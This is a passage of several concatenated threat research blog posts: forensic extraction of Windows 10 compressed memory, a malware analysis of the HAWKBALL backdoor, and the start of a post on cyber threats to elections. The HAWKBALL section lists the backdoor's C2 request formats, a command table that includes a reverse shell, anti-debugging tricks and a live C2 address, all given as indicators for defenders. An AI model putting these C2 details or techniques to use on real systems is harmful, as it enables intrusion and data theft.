Let’s explore the example of locating the offset of ST_DATA_MGR.wCompressionFormat. As shown in Figure 1, this field is the first argument to RtlDecompressBufferEx. This function is publicly available and documented. This is how we originally derived that offset 0x220 in the ST_DATA_MGR structure corresponded to the compression format of the store page in Windows 10 1703 (x86).

Figure 1: Call to RtlDecompressBufferEx; note that the compression format originates from ST_DATA_MGR

To leverage flare-emu in automating the extraction of the value 0x220, we have a few options. For example, from analysis of other kernels, we know that the access to ST_DATA_MGR immediately before decompression is likely to be the compression format. In this case, a stronger extraction algorithm can be leveraged by prepopulating ST_DATA_MGR with a known pattern (see Figure 2).

Figure 2: Known pattern copied into ST_DATA_MGR buffer

Using flare-emu, we emulate the function in which this call is located and examine the stack post-emulation.

0x20101000
0x1163
0x31001200
0x1423
0x20001400
“Km”

Figure 3: Post-emulation stack layout

Knowing that the wCompressionFormat argument originated from the ST_DATA_MGR structure, we see that it is now “Km”. If we were to search for that value in the known pattern, we would find that it begins at offset 0x220. Check out Figure 4 to see how we can leverage flare-emu to solve this challenge.

Figure 4: Code snippet from w10deflate_auto project demonstrating the automation of wCompressionFormat

The decorators preceding the function signify that the extraction algorithm will work on both 32-bit and 64-bit architectures. After generating a known pattern using a helper function within my project, I use flare-emu to allocate a buffer and store a pointer to it in lp_stdatamgr. The pointer is written into the ECX register because I know that the first argument to the parent function, StDmSinglePageCopy, is the pointer to the ST_DATA_MGR structure. The pHook function populates ECX prior to the emulation run. The helper function locate_call_in_fn is used to perform a relaxed search for RtlDecompressBufferEx within StDmSinglePageCopy. Using flare-emu’s iterate function, I force emulation to reach decompression, at which point I read the first item on the stack and then search for it within my known pattern.
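The pattern search at the heart of this technique can be illustrated outside of IDA Pro. The following is a minimal sketch, not the code from the w10deflate_auto project: make_pattern and find_offset are hypothetical helpers, and the emulator's field read is simulated by pulling a 16-bit word straight out of the buffer at offset 0x220.

```python
import struct


def make_pattern(size):
    """Return `size` bytes in which every aligned 16-bit word is unique."""
    if size % 2 or size // 2 > 0xFFFF:
        raise ValueError("size must be even and at most 0x1FFFE bytes")
    # Word i holds the value i + 1, so no word is zero and none repeats.
    return b"".join(struct.pack("<H", i + 1) for i in range(size // 2))


def find_offset(pattern, word):
    """Return the aligned offset of a 16-bit value in the pattern, or -1."""
    needle = struct.pack("<H", word)
    for offset in range(0, len(pattern) - 1, 2):
        if pattern[offset:offset + 2] == needle:
            return offset
    return -1


# Stand-in for emulation: the code under test reads a 16-bit field from the
# pre-populated structure, and the value surfaces as a call argument.
pattern = make_pattern(0x400)
observed = struct.unpack_from("<H", pattern, 0x220)[0]

# Searching the pattern for the observed value recovers the field offset.
recovered = find_offset(pattern, observed)
print(hex(recovered))
```

Because each aligned word appears only once, a single observed argument value is enough to identify the field offset without disassembling the function by hand.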

Techniques like the one described above are ultimately used to retrieve all structure fields involved in the page decompression and can be leveraged in other situations in which an undocumented structure may need tracking across Windows builds. Figure 5 shows the automation utility extracting the fields of the undocumented structures used by the Volatility and Rekall plugins.

Figure 5: Output of automation from within IDA Pro

Keeping Volatility and Rekall Updated

The data generated by the automation script is primarily useful when implemented in Volatility and Rekall. In both Volatility and Rekall, the win10_memcompression.py overlay contains all structure definitions needed for page location and decompression. Figure 6 shows a snippet from the file in which the Windows 10 1903 x86 profile is created.

Figure 6: Structure definition found within win10_memcompression.py overlay

Create a new profile dictionary (ex. win10_mem_comp_x86_1903) corresponding to the Windows build that you are targeting and populate the structure entries accordingly.

Conclusion

Undocumented structures pose a challenge to those who rely on them. This blog post covered how flare-emu can be leveraged to reduce the level of effort needed to analyze new files. We analyzed the extraction of an ST_DATA_MGR field used in page decompression by presenting the problem and then the code involved with automating the effort. The automation code is available on the FireEye GitHub with usage information and documentation available in both the README and code.

Finding Evil in Windows 10 Compressed Memory, Part Two: Virtual Store Deep Dive

Threat Research

Omar Sardar

8 August 2019 at 20:30

Introduction

This blog post is the second in a three-part series covering our Windows 10 memory forensics research and it coincides with our BlackHat USA 2019 presentation. In Part One of the series, we covered the integration of the research in both the Volatility and Rekall memory forensics tools. We demonstrated that forensic artifacts (including reflectively loaded malware) could remain undiscovered without the FLARE research integration on Windows 10 (available on GitHub at win10_volatility and win10_rekall).

In this post, we demonstrate how to retrieve a compressed page using the structures and algorithms described in our white paper. We track down a compressed page in memory, beginning at its virtual address within a known process. A WinDbg kernel debugger setup is used in this walkthrough, but a similar process could be followed from within a memory snapshot or extraction using Volatility or Rekall.

Finding a Compressed Page

The operating system used in this demo is Windows 10.0.15063.0 (x64) and the structure definitions shown will be applicable across any 1703 build. Note that the two global offsets nt!SmGlobals and nt!MmPagingFile will need to be located for each revision. The process of retrieving these global offsets is described further in our white paper.

To begin analysis, we create a marker page and flush it to the Virtual Store. This can be done in several ways, the easiest of which is allocating memory in a memory constrained virtual machine. A simple utility (ram_eater.exe) was created to perform this task. The ram_eater utility allocates and writes a marker page, and then repeatedly allocates more memory in user-specified page amounts. In a memory constrained virtual machine (1 GB RAM), the marker page will become stale shortly and be evicted to the virtual store. In Figure 1, ram_eater reports that it has allocated the marker page at address 0x2a368480000. The marker page we used (see Figure 2) was a string beginning with “CC WAS HERE!”.

Figure 1: Allocating a marker page using ram_eater_x64.exe

We can verify the contents of our marker page by locating it in the kernel debugger, viewing its Page Table Entry (PTE) and dumping its corresponding physical memory (see Figure 2). We use the !process extension to locate ram_eater’s EPROCESS structure and switch into the context of the ram_eater process. This ensures that we traverse the correct process-specific page tables for the ram_eater process. Using the page frame number (pfn) described by the hardware PTE, we dump the physical memory to validate the contents of our marker page. Page frame numbers do not include the low-order bits used to specify an offset into a page, therefore they must be multiplied by PAGE_SIZE (0x1000) to identify the actual address of the data.

Figure 2: Locating and viewing the marker page from the kernel debugger
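The page frame number arithmetic described above is small enough to sketch directly. This is an illustrative example only: the PFN value 0x1234 is made up, and pfn_to_physical and page_offset_of are hypothetical helper names, not debugger commands.

```python
PAGE_SIZE = 0x1000   # 4 KB pages, as stated in the walkthrough
PAGE_SHIFT = 12      # log2(PAGE_SIZE)


def pfn_to_physical(pfn, page_offset=0):
    """Convert a page frame number (plus offset in the page) to a physical address."""
    if not 0 <= page_offset < PAGE_SIZE:
        raise ValueError("page offset must fall inside a single page")
    # Shifting left by 12 is the same as multiplying by PAGE_SIZE.
    return (pfn << PAGE_SHIFT) | page_offset


def page_offset_of(virtual_address):
    """Return the low-order bits that select a byte within the page."""
    return virtual_address & (PAGE_SIZE - 1)


# The marker page address reported by ram_eater is page-aligned.
marker_offset = page_offset_of(0x2A368480000)

# Hypothetical PFN, used only to show the multiplication.
physical = pfn_to_physical(0x1234, marker_offset)
print(hex(physical))
```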

After allocating additional memory using ram_eater, we check to see if the marker page has been sent to the virtual store. Each entry in the output of the !vm extension can be treated as an index into nt!MmPagingFile (see Figure 3).

Figure 3: PTE of a compressed page in the virtual store and confirmation of virtual store’s PageFile index

In the PTE displayed in Figure 3, the PageFile index (MMPTE_SOFTWARE.PageFileLow) is 2 and corresponds to the “No Name for Paging File” entry in the !vm extension’s output. From general observation, we know that on a default Windows configuration, the last entry corresponds to the virtual store. It is possible to configure systems with more than a single PageFile on disk, so do not assume that PageFile index 2 will always correlate to the virtual store.

A more thorough option to validate page file indices is to disassemble nt!MmStoreCheckPagefiles. This function contains references to two global variables, the number of active PageFiles, as well as an array of pointers to each nt!_MMPAGING_FILE structure (see Figure 4). We use the PageFile structure’s newly introduced VirtualStorePagefile field to confirm if the PageFile represents a virtual store.

Figure 4: Locating nt!MmPagingFile in WinDbg and dumping system’s nt!_MMPAGING_FILE structures

Having confirmed that the marker page is in the virtual store, the next step is to calculate the Store Manager Page Key (SM_PAGE_KEY), as it serves as a pseudo-handle to locate the decompressed page. Our white paper details the process used to calculate the SM_PAGE_KEY, which turns out to be 0x201a3061 for this example. Note that we will not use the PTE’s swizzle bit in the page key calculations, since the OS build is below 1803. To begin page retrieval, the pointer to the Store Manager’s global structure, nt!SmGlobals, needs to be located. This is a straightforward process if symbols are available (see Figure 5).

Figure 5: Dumping nt!SmGlobals

The first thing to observe is that both SMKM_STORE_MGR and SMKM are located at offset 0x0, or directly at nt!SmGlobals. Viewed as a memory dump, nt!SmGlobals appears as an array of pointers. Viewed as a two-dimensional array (32x32) of SMKM_STORE_METADATA elements, each element in the array of pointers points to an array of 32 SMKM_STORE_METADATA structures. Each SMKM_STORE_METADATA structure represents a store. To locate our SM_PAGE_KEY’s corresponding store, we need to find the store index associated with the page key inside the SMKM_STORE_MGR.sGlobalTree B+tree container. The store index is a compound value that yields both indices needed to select the particular SMKM_STORE_METADATA element. Let’s traverse the SMKM_STORE_MGR’s global B+tree (Figure 6). Recall that we are interested in a store manager page key value of 0x201a3061.

Figure 6: Traversing the global B+tree

Now that we have the store index (obtained from the SMKM_FRONTEND_ENTRY structure), we calculate both indices to select the correct SMKM_STORE_METADATA structure for our SM_PAGE_KEY. The index into the pointer array is the result of dividing the retrieved store index by 32, while the second one is the remainder of the division operation. In our case both indices are 0 and they select the first of the 1024 stores on the system, which is reserved for legacy applications. Universal Windows Platform (UWP) applications, on the other hand, will be placed in stores from 1 to 1023. Now, with the SMKM_STORE_METADATA known, we examine the store’s SMKM_STORE structure, as shown in Figure 7.

Figure 7: Dumping the SMKM_STORE structure
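The store index split described above, a division by 32 with the remainder as the second index, can be sketched as follows. The function name split_store_index is hypothetical; the 32x32 layout and the 1024-store limit come from the walkthrough.

```python
STORES_PER_ROW = 32   # each pointer references 32 SMKM_STORE_METADATA entries
MAX_STORES = 32 * 32  # 1024 stores in total


def split_store_index(store_index):
    """Split a store index into (pointer array index, metadata array index)."""
    if not 0 <= store_index < MAX_STORES:
        raise ValueError("store index out of range")
    # Quotient selects the pointer, remainder selects the element it points to.
    return divmod(store_index, STORES_PER_ROW)


# Store 0 is the one selected in this walkthrough.
print(split_store_index(0))
# A hypothetical UWP store index, to show a non-zero split.
print(split_store_index(33))
```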

Once we have our SMKM_STORE structure we traverse another B+tree that associates our SM_PAGE_KEY (0x201a3061) with a chunk key. The chunk key is a compound value and once decoded points to a specific page record inside SMHP_CHUNK_METADATA's two-dimensional aChunkPointer array. The B+tree traversal is shown in Figure 8.

Figure 8: Traversing the local B+tree to find the chunk key associated with the SM_PAGE_KEY

Once the B+tree traversal is complete, we find that our chunk key is 0x4b02d. Since it’s a compound value, we need to decode it in order to retrieve the two indices into SMHP_CHUNK_METADATA’s chunk pointer array, and the offset within the located chunk. The decoding involves four additional SMHP_CHUNK_METADATA fields – dwVectorSize, dwPageRecordsPerChunk, dwPageRecordSize, and dwChunkPageHeaderSize. The process is shown in Figure 9.

Figure 9: Retrieving the page record associated with the chunk key

The decoding of the chunk key in Figure 9 allowed us to find all the information to derive the virtual address of our compressed page. The retrieved REGION_KEY (0xf72397, in our case) is also a compound value that encodes the index within the SMKM_STORE’s region pointer array, as well as the offset within the region of pages. To calculate this data, we parse the region key with the help of two fields inside the ST_DATA_MGR structure – dwRegionIndexMask and dwRegionSizeMask. The calculations are shown in Figure 10.

Figure 10: Calculating the compressed page’s virtual address

The virtual address 0x12f3970 calculated in Figure 10 contains the compressed page of interest. We can retrieve it from the MemCompression process space, as shown in Figure 11. To confirm that the compressed memory is located within MemCompression, check the SMKM_STORE structure’s StoreOwnerProcess field.

Figure 11: Retrieving the compressed page from within MemCompression process space

The compressed page can be decompressed with a call to the RtlDecompressBufferEx API or any other implementation that supports the XPRESS compression algorithm.

Conclusion

In this blog post, we shared a walkthrough in which we forced a known marker page into the compression store and manually retrieved it by walking through memory dumps using known structure offsets from Windows 10 1703 x64. The same techniques used here can be applied to Windows 10 1607 and onwards, assuming correct structure offsets are known. In Part 3 of the series, Automating Undocumented Structure Extraction, we will look at how the FLARE team leveraged emulation via flare-emu to automate the extraction of the structures used in this walkthrough.

Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities

Threat Research

Swapnil Patil

5 June 2019 at 15:00

FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

Figure 1 shows the decoy used in the attack.

Figure 1: Decoy used in attack

The decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory through EQENDT32.EXE. Figure 2 shows the decryption mechanism used in EQENDT32.EXE.

Figure 2: Shellcode decryption routine

The decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP (Figure 3).

Figure 3: Payload dropped as Word plugin

Technical Details

DllMain of the dropped payload determines if the string WORD.EXE is present in the sample’s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe < C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP\hh14980443.wll, DllEntry> using the WinExec() function.

DllEntry is the payload’s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:

<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\t<Hardcoded Digit>\t<Hardcoded Digit>\n

Example:

05/22 07:29:17 4 0

This log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).

Figure 4: String format for log file
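For triage, the log format above is simple enough to recognize programmatically. The following is a minimal sketch of a parser for these entries; the regular expression and the field names value_a and value_b are my own, and whitespace between fields is matched loosely because the example above may have lost its tab characters.

```python
import re

# Month/day, time, then two numeric values separated by whitespace (tabs in
# the format string shown above).
LOG_LINE = re.compile(
    r"(?P<month>\d{1,2})/(?P<day>\d{1,2}) "
    r"(?P<hour>\d{1,2}):(?P<minute>\d{2}):(?P<second>\d{2})"
    r"\s+(?P<value_a>\d+)\s+(?P<value_b>\d+)"
)


def parse_log_line(line):
    """Return the numeric fields of a log entry, or None if it does not match."""
    match = LOG_LINE.fullmatch(line.rstrip("\r\n"))
    if match is None:
        return None
    return {name: int(value) for name, value in match.groupdict().items()}


entry = parse_log_line("05/22 07:29:17\t4\t0\n")
print(entry)
```

Lines that carry other content after the timestamp, such as an IP address, do not match and return None.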

The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.

Figure 5: Config decryption routine
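A single-byte XOR with 0xD9 is its own inverse, so one routine both encodes and decodes. The sketch below demonstrates this on a made-up buffer; the sample bytes are illustrative only and do not reproduce the real 0x78-byte config layout.

```python
CONFIG_XOR_KEY = 0xD9  # single-byte key described above


def xor_decode(data, key=CONFIG_XOR_KEY):
    """XOR every byte with the key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


# Illustrative plaintext only: a C2 address and mutex string with NUL padding.
sample_plain = b"149.28.182.78\x00d0c\x00"
sample_encoded = xor_decode(sample_plain)
decoded = xor_decode(sample_encoded)
print(decoded)
```

One practical consequence is that NUL padding in the plaintext appears as runs of 0xD9 bytes in the encoded blob, which can help locate the config and confirm the key.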

The IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:

05/22 07:49:48 149.28.182.78.

Mutex Creation

The malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To do so, it resolves the %APPDATA% environment variable and checks the result for the string config/systemprofile.

Figure 6: Verify whether malware is running as a system profile

If the malware is running as a system profile, the string d0c from the decrypted config file is used to create the mutex. Otherwise, the string _cu is appended to d0c and the mutex is named d0c_cu (Figure 7).

Figure 7: Mutex creation
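The mutex naming logic can be summarized in a few lines, which is handy when predicting the mutex name for a given host. This is a sketch of the decision only, not the malware's code: mutex_name is a hypothetical helper, and normalizing backslashes and case before the comparison is my assumption.

```python
def mutex_name(appdata_path, base="d0c"):
    """Pick the mutex name from the resolved %APPDATA% path."""
    # Assumption: compare case-insensitively and treat both slash styles alike.
    normalized = appdata_path.replace("\\", "/").lower()
    if "config/systemprofile" in normalized:
        return base           # running under the system profile
    return base + "_cu"       # running under a regular user profile


system_name = mutex_name(r"C:\Windows\system32\config\systemprofile\AppData\Roaming")
user_name = mutex_name(r"C:\Users\Administrator\AppData\Roaming")
print(system_name, user_name)
```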

After the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.

Network Communication

HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:

Content-Length: <content_length>
Cache-Control: no-cache
Connection: close

The malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.

Figure 8: Network request

The network request is formed with four parameters in the format shown in Figure 9.

Format = "?t=%d&&s=%d&&p=%s&&k=%d"

Figure 9: GET request parameters formation

Table 1 shows the GET request parameters.

Parameter	Information
t	Initially set to 0
s	Initially set to 0
p	String from decrypted config at 0x68
k	The result of GetTickCount()

Table 1: GET request parameters
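To make the request format concrete, the sketch below rebuilds the first query string from the printf-style format shown in Figure 9. The function name is hypothetical, the p value is taken from the network indicators listed at the end of this post, and the tick count is an arbitrary number.

```python
# printf-style format string taken from Figure 9.
FIRST_REQUEST_FORMAT = "?t=%d&&s=%d&&p=%s&&k=%d"


def first_request_query(p, tick_count, t=0, s=0):
    """Build the query string of the initial GET request."""
    return FIRST_REQUEST_FORMAT % (t, s, p, tick_count)


# "wGH^69" is the p value seen in this campaign; 123456 is an arbitrary tick count.
query = first_request_query("wGH^69", 123456)
print(query)
```

Note the doubled ampersands between parameters, which are unusual in legitimate traffic and may be useful when writing network signatures.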

If the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).

Format = "?e=%d&&t=%d&&k=%d"

Figure 10: Second GET request

Figure 11: Second GET request parameters formation

Table 2 shows information about the parameters.

Parameter	Information
e	Initially set to 0
t	Initially set to 0
k	The result of GetTickCount()

Table 2: Second GET request parameters

If the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.

This Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor’s command.

Figure 12: Function table

Table 3 shows the commands supported by HAWKBALL.

Command	Operation Performed
0	Set URI query string to value
16	Unknown
17	Collect system information
18	Execute a provided argument using CreateProcess
19	Execute a provided argument using CreateProcess and upload output
20	Create a cmd.exe reverse shell, execute a command, and upload output
21	Shut down reverse shell
22	Unknown
23	Shut down reverse shell
48	Download file
64	Get drive geometry and free space for logical drives C-Z
65	Retrieve information about provided directory
66	Delete file
67	Move file

Table 3: HAWKBALL commands
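When reviewing captured traffic, it helps to map a Set-Cookie value straight to its command. The following sketch mirrors Table 3 as a lookup table; the parsing regex and function names are assumptions for illustration and do not reflect how the malware itself parses the header.

```python
import re

# Command IDs and descriptions copied from Table 3.
COMMANDS = {
    0: "Set URI query string to value",
    16: "Unknown",
    17: "Collect system information",
    18: "Execute a provided argument using CreateProcess",
    19: "Execute a provided argument using CreateProcess and upload output",
    20: "Create a cmd.exe reverse shell, execute a command, and upload output",
    21: "Shut down reverse shell",
    22: "Unknown",
    23: "Shut down reverse shell",
    48: "Download file",
    64: "Get drive geometry and free space for logical drives C-Z",
    65: "Retrieve information about provided directory",
    66: "Delete file",
    67: "Move file",
}


def command_from_set_cookie(header_value):
    """Extract the numeric command ID from a Set-Cookie value such as 'ID=17'."""
    match = re.search(r"\bID=(\d+)", header_value)
    return int(match.group(1)) if match else None


def describe_command(command_id):
    """Return the Table 3 description, or a placeholder for unlisted IDs."""
    return COMMANDS.get(command_id, "Not listed in Table 3")


command_id = command_from_set_cookie("ID=17")
print(command_id, describe_command(command_id))
```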

Collect System Information

Command ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:

Computer Name
User Name
IP Address
Active Code Page
OEM Page
OS Version
Architecture Details (x32/x64)
String at 0x68 offset from decrypted config file

This information is retrieved from the victim using the following WINAPI calls:

Format = "%s;%s;%s;%d;%d;%s;%s %dbit"

GetComputerNameA
GetUserNameA
gethostbyname and inet_ntoa
GetACP
GetOEMCP
GetCurrentProcess and IsWow64Process

Figure 13: System information

The collected system information is concatenated together with a semicolon separating each field:

WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit
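Once decrypted, a report in this format can be split back into its fields. The sketch below is one way to do that; the dictionary keys are my own labels, assigned by matching the example against the list of collected items above.

```python
def parse_system_info(report):
    """Split a semicolon-delimited system information report into named fields."""
    fields = report.split(";")
    if len(fields) != 7:
        raise ValueError("expected 7 semicolon-separated fields")
    computer, user, ip, acp, oemcp, config_string, os_field = fields
    # The last field looks like "<OS name> <N>bit"; split on the final space.
    os_name, _, bits = os_field.rpartition(" ")
    if not bits.endswith("bit"):
        raise ValueError("unexpected architecture suffix")
    return {
        "computer_name": computer,
        "user_name": user,
        "ip_address": ip,
        "active_code_page": int(acp),
        "oem_code_page": int(oemcp),
        "config_string": config_string,
        "os_version": os_name,
        "architecture_bits": int(bits[:-3]),
    }


info = parse_system_info(
    "WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit"
)
print(info)
```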

This information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is 0xE5044C18.
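A repeating 4-byte XOR is symmetric, so the same routine can be used to recover the plaintext from captured POST bodies once the key is known. This is a minimal sketch under one loud assumption: the key bytes are applied in the order E5 04 4C 18. The post does not state the byte order the malware uses, so the order may need to be reversed against real traffic.

```python
def xor_with_key(data, key):
    """XOR data with a repeating multi-byte key."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Assumption: key bytes in the order written in the post (0xE5044C18).
KEY = bytes.fromhex("E5044C18")

report = b"WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit"
encrypted = xor_with_key(report, KEY)
recovered_report = xor_with_key(encrypted, KEY)
print(recovered_report == report)
```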

Once encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.

Figure 14: POST request

In the request header, the field Cookie is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.

Table 4 shows the parameters of this POST request.

Parameter	Information
e	Initially set to 0
t	Decimal form of the little-endian XOR key
k	The result of GetTickCount()

Table 4: POST request parameters

Create Process

The malware creates a process with specified arguments. Figure 15 shows the operation.

Figure 15: Command create process

Delete File

The malware deletes the file specified as an argument. Figure 16 shows the operation.

Figure 16: Delete file operation

Get Directory Information

The malware gets information for the provided directory address using the following WINAPI calls:

FindFirstFileW
FindNextFileW
FileTimeToLocalFileTime
FileTimeToSystemTime

Figure 17 shows the API used for collecting information.

Figure 17: Get directory information

Get Disk Information

This command retrieves the drive information for drives C through Z along with available disk space for each drive.

Figure 18: Retrieve drive information

The information is stored in the following format for each drive:

Format = "%d+%d+%d+%d;"

Example: "8+512+6460870+16751103;"
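A record in this format can be turned into byte counts with a small parser. The post does not name the four fields, so the sketch below assumes they follow the output order of the GetDiskFreeSpace API: sectors per cluster, bytes per sector, free clusters, and total clusters. The example values (8 and 512) are consistent with that reading, but it remains an assumption.

```python
def parse_drive_record(record):
    """Parse one '%d+%d+%d+%d;' drive record into sizes in bytes."""
    fields = record.rstrip(";").split("+")
    if len(fields) != 4:
        raise ValueError("expected four '+'-separated integers")
    # Assumed field order, mirroring GetDiskFreeSpace output parameters.
    sectors_per_cluster, bytes_per_sector, free_clusters, total_clusters = map(int, fields)
    cluster_bytes = sectors_per_cluster * bytes_per_sector
    return {
        "cluster_bytes": cluster_bytes,
        "free_bytes": cluster_bytes * free_clusters,
        "total_bytes": cluster_bytes * total_clusters,
    }


drive = parse_drive_record("8+512+6460870+16751103;")
print(drive)
```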

The information for all the available drives is combined and sent to the server using an operation similar to Figure 14.

Anti-Debugging Tricks

Debugger Detection With PEB

The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.

Figure 19: Retrieve value from PEB

NtQueryInformationProcess

The malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:

Passing value 0x7 to ProcessInformationClass:

Figure 20: ProcessDebugPort verification

Passing value 0x1E to ProcessInformationClass:

Figure 21: ProcessDebugObjectHandle verification

Passing value 0x1F to ProcessInformationClass:

Figure 22: ProcessDebugFlags verification

Conclusion

HAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Indicators of Compromise (IOC)

MD5	Name
AC0EAC22CE12EAC9EE15CA03646ED70C	Doc.rtf
D90E45FBF11B5BBDCA945B24D155A4B2	hh14980443.wll

Network Indicators

149.28.182[.]78:443
149.28.182[.]78:80
http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>
http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>
http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)

FireEye Detections

MD5	Product	Signature	Action
AC0EAC22CE12EAC9EE15CA03646ED70C	FireEye Email Security, FireEye Network Security, FireEye Endpoint Security	FE_Exploit_RTF_EQGEN_7, Exploit.Generic.MVX	Block
D90E45FBF11B5BBDCA945B24D155A4B2	FireEye Email Security, FireEye Network Security, FireEye Endpoint Security	Malware.Binary.Dll, FE_APT_Backdoor_Win32_HawkBall_1, APT.Backdoor.Win.HawkBall	Block

Acknowledgement

Thank you to Matt Williams for providing reverse engineering support.

Framing the Problem: Cyber Threats and Elections

Threat Research

Luke McNamara

30 May 2019 at 15:00

This year, Canada, multiple European nations, and others will host high profile elections. The topic of cyber-enabled threats disrupting and targeting elections has become an increasing area of awareness for governments and citizens globally. To develop solutions and security programs to counter cyber threats to elections, it is important to begin with properly categorizing the threat. In this post, we’ll explore the various threats to elections FireEye has observed and provide a framework for organizations to sort these activities.

The Election Ecosystem: Targets

Historically, FireEye has observed targeting of a wide range of organizations connected to elections. In considering their role and criticality to the process of elections, these various entities can be grouped into three categories: core election infrastructure, supporting organizations involved in the administration of elections, and other groups that have a participatory role in the electoral process. All of these entities may be targeted for a variety of reasons to influence or collect intelligence on the electoral process and participants.

FireEye is aware of only limited indications of entities targeted in the first category (light blue area). Although we have not observed direct evidence that actors have manipulated the electoral process in any major national or regional election by infiltrating the systems or hardware used to record or tally votes, the sheer complexity of these systems prevents us from categorically stating that these systems have not been successfully compromised.

Moving outward into the gray section of the diagram, entities that fall into this category include organizations involved in the administration of elections. While these organizations may maintain networks separate from voting systems and tabulation platforms, they play important roles in overseeing and communicating results to the public. FireEye has witnessed breaches into a variety of these organizations, in some cases for the purpose of collecting intelligence or in others to coopt and display false information on publicly-facing systems as part of an influence campaign.

Lastly, FireEye has observed targeting of organizations that are involved in election campaigns and news coverage. Tactics we have witnessed include disinformation campaigns on adversary-maintained infrastructure and social media platforms. For example, in August 2017, we observed several inauthentic news websites created to mimic legitimate local and international media organizations ahead of a sub-Saharan African nation’s presidential election. A subset of the counterfeit domains appears to have been created in coordination with each other, if not by the same actor, to damage the reputation of the presidential nominee for the opposition party.

The Threat Activity

To counter and mitigate risks to elections, properly categorizing the specific activity and intent is important. While terms like “election interference” are often used to describe all of the threats in this space, some of the malicious activity FireEye has witnessed may fall outside this definition. Broadly speaking, most election-related threats can be thought of in four categories: social-media enabled disinformation, cyber espionage, “hack and leak” campaigns, and attacks on critical election infrastructure.

Social-Media Enabled Disinformation: This category includes the activity FireEye has tracked from the Russia-affiliated Internet Research Agency (IRA) and various Iranian disinformation operations. In some cases, this has involved creating fraudulent content on controversial issues and seeking to promote it across social media platforms. In other examples, disinformation campaigns have focused on amplifying issues that already have organic interest. Some of these campaigns may also be involved in politically-motivated messaging on social media platforms prior to elections without a specific focus on electoral events.
Cyber Espionage: Nation state actors like Russia-nexus APT28 and Sandworm Team, and China-nexus APT40, have carried out cyber espionage operations against multiple types of targets in the election ecosystem. This has ranged from intrusions into everything from political campaigns to election commissions, likely for a variety of reasons. In some cases, these actors are possibly seeking to obtain information on policy stances of candidates and political parties. In other situations—particularly against election administrators or system vendors—it is possible that these intrusions are reconnaissance for further operations, seeking to understand network layouts that may allow them to move into more critical infrastructure.
“Hack and Leak” Campaigns: Some threat actors that FireEye has observed have utilized the data they’ve gained from espionage intrusions to then leak that information with the intent of influencing public perception. In this manner, they combine the previous two categories of activity. Notably, this tactic has been employed by Guccifer 2.0 and DC Leaks in the 2016 U.S. election. In some cases, similar tactics have leveraged compromised infrastructure to carry out disinformation operations, such as in the 2014 Ukrainian presidential campaign in which Russian-nexus actors posted erroneous election results from the compromised Ukrainian election commission website.
Attacks on Critical Election Infrastructure: Compromises into core critical infrastructure such as election management systems, voting systems, electronic pollbooks, and others represent the most critical risks to elections, with the potential to alter or delete votes or voters from voter rolls. Though this is an often-discussed risk, there is limited evidence of intrusion activity targeting core election infrastructure.

